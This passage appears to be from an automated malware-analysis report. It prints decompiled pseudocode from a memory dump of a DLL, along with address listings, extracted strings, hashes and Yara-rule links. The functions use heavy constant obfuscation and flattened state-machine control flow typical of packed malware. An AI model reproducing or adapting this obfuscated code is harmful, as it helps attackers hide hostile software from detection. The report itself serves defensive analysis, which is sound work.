				_v16 = _v16 ^ 0x74e3faeb;
				_v24 = 0x4cf5d0;
				_v24 = _v24 + 0xffffb61f;
				_v24 = _v24 ^ 0x3d7bacbe;
				_v24 = _v24 + 0xfffff6f6;
				_v24 = _v24 ^ 0x3d3ceb08;
				_v144 = 0x83914b;
				_v144 = _v144 >> 0xf;
				_v144 = _v144 ^ 0x000f4acf;
				_v96 = 0xd72bde;
				_v96 = _v96 >> 5;
				_v96 = _v96 / _t457;
				_v96 = _v96 ^ 0x000ec649;
				_v120 = 0x85287;
				_t458 = 0x3c;
				_v120 = _v120 * 0x31;
				_v120 = _v120 ^ 0x01926ce6;
				_v40 = 0x61f936;
				_v40 = _v40 + 0x8f56;
				_v40 = _v40 ^ 0xf5498dac;
				_v40 = _v40 + 0xdf21;
				_v40 = _v40 ^ 0xf5255440;
				_v56 = 0x2fc1e4;
				_v56 = _v56 * 0x7c;
				_v56 = _v56 * 0x55;
				_v56 = _v56 / _t458;
				_v56 = _v56 ^ 0x02e570e1;
				_v48 = 0x4ad520;
				_v48 = _v48 >> 3;
				_v48 = _v48 + 0x9653;
				_t459 = 0x60;
				_v48 = _v48 / _t459;
				_v48 = _v48 ^ 0x000657a4;
				_v108 = 0x4ac34;
				_v108 = _v108 | 0x6aeacb0a;
				_v108 = _v108 ^ 0x6ae5137b;
				_t450 = _v108;
				while(1) {
					_t439 = 0x2e;
					L2:
					while(_t398 != 0x17a07fe) {
						if(_t398 == 0x1cf3d31) {
							_v160 = _t396;
							_t398 = 0xb9d20c3;
							continue;
						}
						if(_t398 == 0x2587a8b) {
							_t383 = E1000B627( &_v792, _v116, _v104,  &_v1312, _v32);
							_t450 = _t383;
							_t463 = _t463 + 0xc;
							__eflags = _t450 - 0xffffffff;
							if(_t450 == 0xffffffff) {
								return _t383;
							}
							_t398 = 0x48dfa5d;
							while(1) {
								_t439 = 0x2e;
								goto L2;
							}
						}
						if(_t398 == 0x48dfa5d) {
							_t384 = _v28;
							__eflags = _v792 & _t384;
							if((_v792 & _t384) == 0) {
								_t387 = _a12( &_v792,  &_v200);
								asm("sbb ecx, ecx");
								_t398 = ( ~_t387 & 0xf42a9696) + 0xd4f7168;
								while(1) {
									_t439 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v748 - _t439;
							if(_v748 != _t439) {
								L17:
								__eflags = _a20;
								if(_a20 != 0) {
									_push(_v44);
									_push(_v12);
									_push(_v60);
									E100049CE(_t396,  &_v748, E1000416C(_v140, 0x100012f8), _v76, _v136, _v140, _v68, _v124);
									E1001F0A7( &_v1832, _v84, _v132, _a8, _a12, _v16, _a20);
									_t463 = _t463 + 0x3c;
									_t387 = E1000B952(_v24, _t392, _v144, _v96);
									_t439 = 0x2e;
								}
								L16:
								_t398 = 0x17a07fe;
								continue;
							}
							__eflags = _v746;
							if(_v746 == 0) {
								goto L16;
							}
							__eflags = _v746 - _t439;
							if(_v746 != _t439) {
								goto L17;
							}
							__eflags = _v744;
							if(_v744 != 0) {
								goto L17;
							}
							goto L16;
						}
						if(_t398 == 0xb9d20c3) {
							_push(_v128);
							_push(_v64);
							_push(_v92);
							E100206BE(_v88, __eflags, _v72,  &_v1312, _v36, E1000416C(_v36, 0x100012d8), _v20, _t396);
							_t387 = E1000B952(_v52, _t388, _v100, _v112);
							_t463 = _t463 + 0x2c;
							_t398 = 0x2587a8b;
							while(1) {
								_t439 = 0x2e;
								goto L2;
							}
						}
						if(_t398 != 0xd4f7168) {
							L26:
							__eflags = _t398 - 0x776c03b;
							if(_t398 != 0x776c03b) {
								continue;
							}
							return _t387;
						}
						return E1001E24E(_v56, _t450, _v48, _v108);
					}
					_t381 = E10011B49(_v120, _t450,  &_v792, _v40);
					__eflags = _t381;
					if(_t381 != 0) {
						_t398 = 0x48dfa5d;
						_t439 = 0x2e;
						goto L26;
					}
					_t398 = 0xd4f7168;
				}
			}

0x1001f0b3
0x1001f0b6
0x1001f0b8
0x1001f0bb
0x1001f0be
0x1001f0c1
0x1001f0c4
0x1001f0c5
0x1001f0c6
0x1001f0cb
0x1001f0d2
0x1001f0d5
0x1001f0de
0x1001f0e5
0x1001f0ea
0x1001f0f1
0x1001f0f8
0x1001f0ff
0x1001f103
0x1001f10c
0x1001f111
0x1001f116
0x1001f11d
0x1001f124
0x1001f12c
0x1001f12d
0x1001f130
0x1001f137
0x1001f13e
0x1001f145
0x1001f14c
0x1001f153
0x1001f15a
0x1001f161
0x1001f168
0x1001f173
0x1001f176
0x1001f17a
0x1001f181
0x1001f18d
0x1001f190
0x1001f197
0x1001f19e
0x1001f1a5
0x1001f1ac
0x1001f1b3
0x1001f1ba
0x1001f1c1
0x1001f1c8
0x1001f1d3
0x1001f1d6
0x1001f1dd
0x1001f1e8
0x1001f1ef
0x1001f1f2
0x1001f1f6
0x1001f1fd
0x1001f204
0x1001f20b
0x1001f20f
0x1001f216
0x1001f21d
0x1001f224
0x1001f22b
0x1001f232
0x1001f239
0x1001f242
0x1001f249
0x1001f250
0x1001f257
0x1001f25e
0x1001f26b
0x1001f26e
0x1001f278
0x1001f27f
0x1001f282
0x1001f285
0x1001f28c
0x1001f296
0x1001f2a0
0x1001f2aa
0x1001f2b1
0x1001f2b8
0x1001f2bc
0x1001f2c3
0x1001f2ca
0x1001f2d1
0x1001f2d8
0x1001f2df
0x1001f2e6
0x1001f2f4
0x1001f2fb
0x1001f2fe
0x1001f305
0x1001f308
0x1001f30f
0x1001f316
0x1001f31e
0x1001f321
0x1001f328
0x1001f33c
0x1001f342
0x1001f34c
0x1001f353
0x1001f35a
0x1001f361
0x1001f368
0x1001f36f
0x1001f376
0x1001f37d
0x1001f387
0x1001f38c
0x1001f391
0x1001f398
0x1001f39f
0x1001f3a9
0x1001f3ac
0x1001f3af
0x1001f3b6
0x1001f3bd
0x1001f3c4
0x1001f3c8
0x1001f3d1
0x1001f3d8
0x1001f3df
0x1001f3e6
0x1001f3ed
0x1001f3f4
0x1001f3fb
0x1001f405
0x1001f40c
0x1001f416
0x1001f41d
0x1001f428
0x1001f42d
0x1001f434
0x1001f43f
0x1001f442
0x1001f445
0x1001f44c
0x1001f453
0x1001f45a
0x1001f461
0x1001f468
0x1001f46f
0x1001f47a
0x1001f481
0x1001f48b
0x1001f48e
0x1001f495
0x1001f49c
0x1001f4a0
0x1001f4aa
0x1001f4ad
0x1001f4b0
0x1001f4b7
0x1001f4be
0x1001f4c5
0x1001f4cc
0x1001f4cf
0x1001f4d1
0x00000000
0x1001f4d2
0x1001f4e4
0x1001f6a5
0x1001f6ab
0x00000000
0x1001f6ab
0x1001f4f0
0x1001f688
0x1001f68d
0x1001f68f
0x1001f692
0x1001f695
0x1001f52e
0x1001f52e
0x1001f69b
0x1001f4cf
0x1001f4d1
0x00000000
0x1001f4d1
0x1001f4cf
0x1001f4fc
0x1001f582
0x1001f585
0x1001f58b
0x1001f658
0x1001f65f
0x1001f667
0x1001f4cf
0x1001f4d1
0x00000000
0x1001f4d1
0x1001f4cf
0x1001f591
0x1001f598
0x1001f5c1
0x1001f5c1
0x1001f5c5
0x1001f5c7
0x1001f5cf
0x1001f5d2
0x1001f605
0x1001f625
0x1001f62a
0x1001f63b
0x1001f644
0x1001f644
0x1001f5b7
0x1001f5b7
0x00000000
0x1001f5b7
0x1001f59a
0x1001f5a2
0x00000000
0x00000000
0x1001f5a4
0x1001f5ab
0x00000000
0x00000000
0x1001f5ad
0x1001f5b5
0x00000000
0x00000000
0x00000000
0x1001f5b5
0x1001f508
0x1001f52f
0x1001f537
0x1001f53a
0x1001f560
0x1001f570
0x1001f575
0x1001f578
0x1001f4cf
0x1001f4d1
0x00000000
0x1001f4d1
0x1001f4cf
0x1001f510
0x1001f6e1
0x1001f6e1
0x1001f6e7
0x00000000
0x00000000
0x00000000
0x1001f6e7
0x00000000
0x1001f527
0x1001f6c4
0x1001f6cb
0x1001f6cd
0x1001f6db
0x1001f6e0
0x00000000
0x1001f6e0
0x1001f6cf
0x1001f6cf

Strings

hqO, xrefs: 1001F50A
hqO, xrefs: 1001F6CF

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: hqO$hqO
API String ID: 0-4180003690
Opcode ID: ac3308a5b5ab98e68af5c7ebf6c7e386b11494e01a1f41f772d63d59649a0dcf
Instruction ID: 8f456d01c43d566ade2966ba6aceaf6316860b713dddcac4e406885ed18459dc
Opcode Fuzzy Hash: ac3308a5b5ab98e68af5c7ebf6c7e386b11494e01a1f41f772d63d59649a0dcf
Instruction Fuzzy Hash: CA022272D00319DBDF28CFE1D98A9EEBBB2FB44354F208159E116BA260D7B45A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000D8F0, Relevance: 2.6, Strings: 2, Instructions: 148
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000D8F0(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* __ecx;
				void* _t112;
				signed int _t130;
				signed int _t133;
				signed int _t134;
				void* _t137;
				signed int* _t153;
				signed int* _t156;

				_t153 = _a4;
				_t152 = _a12;
				_push(_a12);
				_push(_a8);
				_push(_t153);
				E100167B8(_t112);
				_v56 = 0x54f7cd;
				_v52 = 0;
				_t156 =  &(( &_v100)[5]);
				_v48 = 0;
				_v64 = 0x133435;
				_t137 = 0x23fc4db;
				_v64 = _v64 + 0x1b8c;
				_v64 = _v64 ^ 0x00134fc1;
				_v68 = 0x3c1892;
				_v68 = _v68 | 0xb94d91b6;
				_v68 = _v68 ^ 0xb97e5c55;
				_v72 = 0xb311f7;
				_v72 = _v72 + 0x9720;
				_v72 = _v72 ^ 0x00b41b0b;
				_v92 = 0xacfd87;
				_t133 = 0x64;
				_v92 = _v92 * 0x47;
				_v92 = _v92 + 0xffff55f6;
				_v92 = _v92 ^ 0x2ff3bf70;
				_v76 = 0x1c45fd;
				_v76 = _v76 << 9;
				_v76 = _v76 ^ 0x3886b727;
				_v80 = 0x281637;
				_v80 = _v80 + 0x832;
				_v80 = _v80 ^ 0x002f635a;
				_v96 = 0xb01626;
				_v96 = _v96 | 0x84a96e7f;
				_v96 = _v96 / _t133;
				_v96 = _v96 ^ 0x015d1143;
				_v100 = 0x63dec8;
				_v100 = _v100 | 0xf25dc86a;
				_v100 = _v100 + 0xfffff84d;
				_t134 = 0x4d;
				_v100 = _v100 / _t134;
				_v100 = _v100 ^ 0x032b04d8;
				_a4 = 0xa638ad;
				_a4 = _a4 * 0x1d;
				_a4 = _a4 + 0x3164;
				_a4 = _a4 >> 5;
				_a4 = _a4 ^ 0x00936137;
				_v88 = 0xff8f0e;
				_v88 = _v88 ^ 0x92fc7f09;
				_v88 = _v88 ^ 0x41b6336b;
				_v88 = _v88 ^ 0xd3bc0e7b;
				_v84 = 0x812616;
				_v84 = _v84 ^ 0x0cf4c443;
				_v84 = _v84 << 2;
				_v84 = _v84 ^ 0x31d56267;
				_v60 = 0xbce76c;
				_v60 = _v60 + 0xffff6938;
				_v60 = _v60 ^ 0x00b612f9;
				do {
					while(_t137 != 0x32f329) {
						if(_t137 == 0x23fc4db) {
							_t137 = 0xfb105b8;
							 *_t153 = 0;
							_t153[1] = _v64;
							continue;
						} else {
							if(_t137 == 0x47b5cd0) {
								E1001177E(_t152 + 4,  &_v44, __eflags, _v84, _v60);
							} else {
								if(_t137 == 0xaf2c187) {
									_push(_t137);
									_t130 = E100134E7(_t137, _t153[1]);
									_t156 =  &(_t156[3]);
									 *_t153 = _t130;
									__eflags = _t130;
									if(__eflags != 0) {
										_t137 = 0xe0f24a4;
										continue;
									}
								} else {
									if(_t137 == 0xe0f24a4) {
										_t94 =  &_v80; // 0x2f635a
										E1000A488(_t153,  &_v44,  *_t94, _v96);
										_t156 =  &(_t156[2]);
										_t137 = 0x32f329;
										continue;
									} else {
										if(_t137 != 0xfb105b8) {
											goto L13;
										} else {
											_t153[1] = E1000BC07(_t152);
											_t137 = 0xaf2c187;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t153;
						_t111 =  *_t153 != 0;
						__eflags = _t111;
						return 0 | _t111;
					}
					E10011C78(_v100,  *_t152, _a4,  &_v44, _v88);
					_t156 =  &(_t156[3]);
					_t137 = 0x47b5cd0;
					L13:
					__eflags = _t137 - 0xaf7d4cc;
				} while (__eflags != 0);
				goto L16;
			}

0x1000d8f6
0x1000d8fb
0x1000d902
0x1000d903
0x1000d90a
0x1000d90d
0x1000d912
0x1000d91c
0x1000d920
0x1000d923
0x1000d929
0x1000d931
0x1000d936
0x1000d93e
0x1000d946
0x1000d94e
0x1000d956
0x1000d95e
0x1000d966
0x1000d96e
0x1000d976
0x1000d985
0x1000d988
0x1000d98c
0x1000d994
0x1000d99c
0x1000d9a4
0x1000d9a9
0x1000d9b1
0x1000d9b9
0x1000d9c1
0x1000d9c9
0x1000d9d1
0x1000d9e1
0x1000d9e5
0x1000d9ed
0x1000d9f5
0x1000d9fd
0x1000da09
0x1000da11
0x1000da15
0x1000da1d
0x1000da2a
0x1000da2e
0x1000da36
0x1000da3b
0x1000da43
0x1000da4b
0x1000da53
0x1000da5b
0x1000da63
0x1000da6b
0x1000da73
0x1000da78
0x1000da80
0x1000da88
0x1000da90
0x1000da98
0x1000da98
0x1000daaa
0x1000db2c
0x1000db31
0x1000db33
0x00000000
0x1000daac
0x1000dab2
0x1000db7b
0x1000dab8
0x1000dabe
0x1000db0e
0x1000db13
0x1000db18
0x1000db1b
0x1000db1d
0x1000db1f
0x1000db21
0x00000000
0x1000db21
0x1000dac0
0x1000dac2
0x1000daeb
0x1000daef
0x1000daf4
0x1000daf7
0x00000000
0x1000dac4
0x1000daca
0x00000000
0x1000dad0
0x1000dad7
0x1000dada
0x00000000
0x1000dada
0x1000daca
0x1000dac2
0x1000dabe
0x1000dab2
0x1000db83
0x1000db85
0x1000db89
0x1000db89
0x1000db90
0x1000db90
0x1000db51
0x1000db56
0x1000db59
0x1000db5e
0x1000db5e
0x1000db5e
0x00000000

Strings

d1, xrefs: 1000DA2E
Zc/, xrefs: 1000DAEB

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Zc/$d1
API String ID: 0-1428125794
Opcode ID: 12c85d2aeb0d05e5e233a54128cd7f9c3403b68e524ef8739800047c034d26a6
Instruction ID: 411c3a5c496db57da22df97b869813e323ef2d1a9b8ca3244df8558e2c0cee3a
Opcode Fuzzy Hash: 12c85d2aeb0d05e5e233a54128cd7f9c3403b68e524ef8739800047c034d26a6
Instruction Fuzzy Hash: 9B6152711083029FE368DF24C48982FBBE5FF95398F608A1DF19696260D771DA49CF92

Uniqueness

Uniqueness Score: -1.00%

Function 10014F2A, Relevance: 2.6, Strings: 2, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10014F2A(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v316;
				char _t143;
				signed int _t146;
				void* _t150;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				char* _t156;
				intOrPtr* _t175;
				void* _t176;
				void* _t177;

				_v24 = 0x10c3e8;
				_v24 = _v24 | 0xcfaa1ecb;
				_v24 = _v24 + 0x44e6;
				_t175 = __ecx;
				_t152 = 0x64;
				_v24 = _v24 / _t152;
				_v24 = _v24 ^ 0x021ae9fa;
				_v32 = 0xa97339;
				_v32 = _v32 | 0xbffedffe;
				_v32 = _v32 ^ 0xbff6ab95;
				_v52 = 0xc187af;
				_v52 = _v52 << 6;
				_v52 = _v52 ^ 0x306883be;
				_v8 = 0xa4f548;
				_t153 = 0x41;
				_v8 = _v8 * 0x70;
				_v8 = _v8 | 0x25e1af48;
				_v8 = _v8 * 0x28;
				_v8 = _v8 ^ 0x2cdb1251;
				_v16 = 0x195647;
				_v16 = _v16 ^ 0x32479c73;
				_v16 = _v16 + 0xfffffbcd;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x2f65adce;
				_v48 = 0x686de;
				_v48 = _v48 | 0x7f0a8a82;
				_v48 = _v48 * 0x5a;
				_v48 = _v48 ^ 0xab1c1456;
				_v40 = 0x7be114;
				_v40 = _v40 + 0x10ce;
				_v40 = _v40 ^ 0x55b96dfc;
				_v40 = _v40 ^ 0x55c095ca;
				_v20 = 0x7b8d26;
				_v20 = _v20 / _t153;
				_t154 = 0x3d;
				_v20 = _v20 * 0x18;
				_v20 = _v20 ^ 0x5b90e27b;
				_v20 = _v20 ^ 0x5bb95e1f;
				_v12 = 0x7e7b8b;
				_v12 = _v12 | 0x66762986;
				_v12 = _v12 / _t154;
				_v12 = _v12 + 0xffffaaae;
				_v12 = _v12 ^ 0x01ae6361;
				_v44 = 0x645e2e;
				_v44 = _v44 + 0xb190;
				_v44 = _v44 << 3;
				_v44 = _v44 ^ 0x0324f6f7;
				_v56 = 0x47bc38;
				_v56 = _v56 + 0xffff8017;
				_v56 = _v56 ^ 0x004714ea;
				_v36 = 0xdee381;
				_v36 = _v36 + 0x75a5;
				_t155 = 0x55;
				_v36 = _v36 / _t155;
				_v36 = _v36 ^ 0x00029718;
				_v28 = 0x2633ec;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x56e1b35d;
				_v28 = _v28 ^ 0x347cc20e;
				_v28 = _v28 ^ 0x62948398;
				_t156 =  &_v316;
				while(1) {
					_t143 =  *_t175;
					if(_t143 == 0) {
						break;
					}
					if(_t143 == 0x2e) {
						 *_t156 = 0;
					} else {
						 *_t156 = _t143;
						_t156 = _t156 + 1;
						_t175 = _t175 + 1;
						continue;
					}
					L6:
					_t176 = E1001E69C( &_v316, _v24, _v32, _v52);
					if(_t176 != 0) {
						L8:
						_t146 = E1001D72F(_v20, _v12, _t175 + 1, _v44);
						_push(_v28);
						_push(_t176);
						_push(_t146 ^ 0x3aacd9b2);
						return E100103C9(_v56, _v36);
					}
					_t150 = E10010E34(_v8, _v16, _v48, _v40,  &_v316);
					_t176 = _t150;
					_t177 = _t177 + 0xc;
					if(_t176 != 0) {
						goto L8;
					}
					return _t150;
				}
				goto L6;
			}

0x10014f33
0x10014f3c
0x10014f43
0x10014f51
0x10014f53
0x10014f58
0x10014f5d
0x10014f64
0x10014f6b
0x10014f72
0x10014f79
0x10014f80
0x10014f84
0x10014f8b
0x10014f96
0x10014f99
0x10014f9c
0x10014fa7
0x10014faa
0x10014fb1
0x10014fb8
0x10014fbf
0x10014fc6
0x10014fca
0x10014fd1
0x10014fd8
0x10014fe3
0x10014fe6
0x10014fed
0x10014ff4
0x10014ffb
0x10015002
0x10015009
0x10015017
0x1001501e
0x10015021
0x10015024
0x1001502b
0x10015032
0x10015039
0x10015047
0x1001504a
0x10015051
0x10015058
0x1001505f
0x10015066
0x1001506a
0x10015071
0x10015078
0x1001507f
0x10015086
0x1001508d
0x10015097
0x1001509a
0x1001509d
0x100150a4
0x100150ab
0x100150af
0x100150b6
0x100150bd
0x100150c4
0x100150d4
0x100150d4
0x100150d8
0x00000000
0x00000000
0x100150ce
0x100150dc
0x100150d0
0x100150d0
0x100150d2
0x100150d3
0x00000000
0x100150d3
0x100150df
0x100150f3
0x100150f9
0x1001511c
0x10015129
0x1001512e
0x1001513c
0x1001513d
0x00000000
0x10015143
0x1001510e
0x10015113
0x10015115
0x1001511a
0x00000000
0x00000000
0x1001514b
0x1001514b
0x00000000

Strings

3&, xrefs: 100150A4
.^d, xrefs: 10015058

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: .^d$3&
API String ID: 0-187105521
Opcode ID: 7e61f7cdcc85e1032ece3fe8fc47089dcb88dee48ace1a9f7c733bd01d82e962
Instruction ID: bf4c53cc4c31d355a02d66585ee87c997cdf93a81800cda7b29a75e584a6520a
Opcode Fuzzy Hash: 7e61f7cdcc85e1032ece3fe8fc47089dcb88dee48ace1a9f7c733bd01d82e962
Instruction Fuzzy Hash: 10512271C0121AEBCF48CFE5C94A5DEFBB1FB48314F208199D411BA260D7B55A86CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10002317, Relevance: 2.6, Strings: 2, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10002317() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t127;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int* _t144;

				_t144 =  &_v48;
				_v16 = 0x4b7695;
				_v16 = _v16 + 0x32f4;
				_v16 = _v16 ^ 0x0042f17a;
				_v32 = 0x779e68;
				_v32 = _v32 + 0xffffdaad;
				_v32 = _v32 + 0xffff2bb1;
				_v32 = _v32 ^ 0x007d6c86;
				_v20 = 0xc20505;
				_v20 = _v20 + 0x6249;
				_v20 = _v20 ^ 0x00cb0518;
				_v24 = 0x16aa49;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x00074686;
				_v28 = 0x7fc1fa;
				_v28 = _v28 ^ 0x3ab1455f;
				_t139 = 0x37;
				_v28 = _v28 / _t139;
				_t127 = 0xf16575e;
				_v28 = _v28 ^ 0x011fdcc2;
				_v44 = 0x23ecdf;
				_t140 = 0x49;
				_v44 = _v44 * 0x61;
				_v44 = _v44 + 0x3d45;
				_v44 = _v44 << 0x10;
				_v44 = _v44 ^ 0xfdcb9032;
				_v12 = 0x868de;
				_v12 = _v12 / _t140;
				_v12 = _v12 ^ 0x0007465e;
				_v48 = 0xd980a4;
				_t141 = 0x6f;
				_v48 = _v48 / _t141;
				_v48 = _v48 + 0x6c01;
				_v48 = _v48 | 0xf9c8c279;
				_v48 = _v48 ^ 0xf9c53716;
				_v4 = 0xbf5790;
				_v4 = _v4 >> 0x10;
				_v4 = _v4 ^ 0x0005e3de;
				_v8 = 0x3fa85d;
				_v8 = _v8 * 0x65;
				_v8 = _v8 ^ 0x191a77ca;
				_v36 = 0x707bfd;
				_v36 = _v36 + 0xffff8b9a;
				_v36 = _v36 | 0x9f80ebff;
				_v36 = _v36 ^ 0x9ffca4f6;
				_v40 = 0xec10c1;
				_v40 = _v40 + 0xffffb3d4;
				_v40 = _v40 * 0x52;
				_v40 = _v40 * 0x29;
				_v40 = _v40 ^ 0x18457723;
				do {
					while(_t127 != 0x2c2d270) {
						if(_t127 == 0x7389d1b) {
							_t118 = E10016336(_v28, _v44, _v12, _t127, _t127, _v48);
							_t137 =  *0x10025220;
							_t144 =  &(_t144[6]);
							_t127 = 0x2c2d270;
							 *((intOrPtr*)(_t137 + 0x10)) = _t118;
							continue;
						} else {
							if(_t127 == 0xf16575e) {
								_push(_t127);
								_t137 = E100134E7(_t127, 0x1c);
								_t144 =  &(_t144[3]);
								 *0x10025220 = _t137;
								_t127 = 0x7389d1b;
								continue;
							}
						}
						goto L7;
					}
					_t117 = E10009B9F(_v4, _t127, _v8, E1000ADD9, _t127, _v36, _v40, _t127, 0);
					_t144 =  &(_t144[8]);
					_t127 = 0xb065f1a;
					 *((intOrPtr*)( *0x10025220 + 8)) = _t117;
					L7:
				} while (_t127 != 0xb065f1a);
				return 0 | _t137 != 0x00000000;
			}

0x10002317
0x1000231a
0x10002324
0x1000232c
0x10002334
0x1000233c
0x10002344
0x1000234c
0x10002354
0x1000235c
0x10002364
0x1000236c
0x10002374
0x10002378
0x10002380
0x10002388
0x1000239a
0x100023a4
0x100023a8
0x100023aa
0x100023b7
0x100023cb
0x100023ce
0x100023d2
0x100023da
0x100023df
0x100023e7
0x100023f7
0x100023fb
0x10002403
0x1000240f
0x10002417
0x1000241b
0x10002423
0x1000242b
0x10002433
0x1000243b
0x10002440
0x10002448
0x10002455
0x10002459
0x10002461
0x10002469
0x10002471
0x10002479
0x10002481
0x10002489
0x10002496
0x1000249f
0x100024a3
0x100024b1
0x100024b1
0x100024b7
0x100024f7
0x100024fc
0x10002502
0x10002505
0x10002507
0x00000000
0x100024b9
0x100024bb
0x100024cd
0x100024d6
0x100024d8
0x100024db
0x100024e1
0x00000000
0x100024e1
0x100024bb
0x00000000
0x100024b7
0x10002526
0x10002531
0x10002534
0x10002536
0x10002539
0x10002539
0x1000254f

Strings

Ib, xrefs: 1000235C
E=, xrefs: 100023D2

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: E=$Ib
API String ID: 0-3912440412
Opcode ID: a1ffa3ae5acd7dc385b3ca7f68b983f20f1ed84cf44ec3f6cbb3a2b8cc999739
Instruction ID: 224b6d703b361d7d99f2773054a90b4793b62bbd2713d517ca90c141b23e7c96
Opcode Fuzzy Hash: a1ffa3ae5acd7dc385b3ca7f68b983f20f1ed84cf44ec3f6cbb3a2b8cc999739
Instruction Fuzzy Hash: C05174B1508342DFD358CF24D98641FBBE1FBC8394F50491DF4968A261D3B5CA8A8F82

Uniqueness

Uniqueness Score: -1.00%

Function 10002617, Relevance: 2.6, Strings: 2, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10002617() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				void* _v68;
				intOrPtr _v72;
				char _v592;
				intOrPtr* _t130;
				signed int _t134;
				signed int _t135;
				signed int _t136;

				_v72 = 0x9d05ed;
				asm("stosd");
				_v56 = 0;
				_t134 = 0x2a;
				asm("stosd");
				asm("stosd");
				_v28 = 0x3e007b;
				_v28 = _v28 ^ 0x4c91a581;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xd2f98bf6;
				_v32 = 0xa9b786;
				_v32 = _v32 | 0x44355110;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x25e25b17;
				_v48 = 0x550d78;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x4351bdf7;
				_v44 = 0x2c52d6;
				_v44 = _v44 + 0x92b3;
				_v44 = _v44 ^ 0x002f9c72;
				_v40 = 0x93bcf3;
				_v40 = _v40 + 0xffff9780;
				_v40 = _v40 ^ 0x97132160;
				_v40 = _v40 ^ 0x9784e530;
				_v16 = 0x5eb70b;
				_t135 = 0x1b;
				_v16 = _v16 / _t134;
				_v16 = _v16 / _t135;
				_v16 = _v16 + 0x2cf;
				_v16 = _v16 ^ 0x0008653c;
				_v52 = 0xdabea1;
				_v52 = _v52 ^ 0x96d888e0;
				_v52 = _v52 ^ 0x9604db1b;
				_v20 = 0x7ebda1;
				_t136 = 0x42;
				_v20 = _v20 / _t136;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x00016b89;
				_v8 = 0x438ffe;
				_v8 = _v8 * 0x38;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x000fa3f8;
				_v24 = 0xf2beb5;
				_v24 = _v24 * 0x7f;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x1e10c917;
				_v36 = 0x6b0821;
				_v36 = _v36 + 0xffff5d8a;
				_v36 = _v36 + 0xffffbcb4;
				_v36 = _v36 ^ 0x006728d6;
				_v12 = 0x4e8339;
				_v12 = _v12 + 0xffffd6fe;
				_v12 = _v12 + 0x61bf;
				_v12 = _v12 + 0xffffae99;
				_v12 = _v12 ^ 0x004c7c0b;
				_t137 =  &_v592;
				if(E1000B809( &_v592, _v32, _t136, _v48, _v44) != 0) {
					_t130 =  &_v592;
					if(_v592 != 0) {
						while( *_t130 != 0x5c) {
							_t130 = _t130 + 2;
							if( *_t130 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t137 = 0;
						 *((short*)(_t130 + 2)) = 0;
					}
					L6:
					E1001CEE9(_v40, _v16, _t137, _t137, _v52, _t137,  &_v592, _v20, _t137, _v8,  &_v56, _v24, _v36, _t137, _v12);
				}
				return _v56;
			}

0x10002620
0x10002630
0x10002633
0x10002638
0x10002639
0x1000263c
0x1000263d
0x10002644
0x1000264b
0x1000264f
0x10002656
0x1000265d
0x10002664
0x10002668
0x1000266f
0x10002676
0x1000267a
0x10002681
0x10002688
0x1000268f
0x10002696
0x1000269d
0x100026a4
0x100026ab
0x100026b2
0x100026be
0x100026bf
0x100026cb
0x100026d0
0x100026d7
0x100026de
0x100026e5
0x100026ec
0x100026f3
0x100026fd
0x10002700
0x10002703
0x10002707
0x1000270e
0x10002719
0x1000271c
0x10002720
0x10002724
0x1000272b
0x10002736
0x10002739
0x1000273d
0x10002744
0x1000274b
0x10002752
0x10002759
0x10002760
0x10002767
0x1000276e
0x10002775
0x1000277c
0x10002790
0x100027a0
0x100027a2
0x100027af
0x100027b1
0x100027b7
0x100027bd
0x00000000
0x00000000
0x100027bf
0x00000000
0x100027bd
0x100027c1
0x100027c3
0x100027c3
0x100027c7
0x100027ef
0x100027f4
0x100027ff

Strings

{, xrefs: 1000263D
xU, xrefs: 1000266F

Memory Dump Source

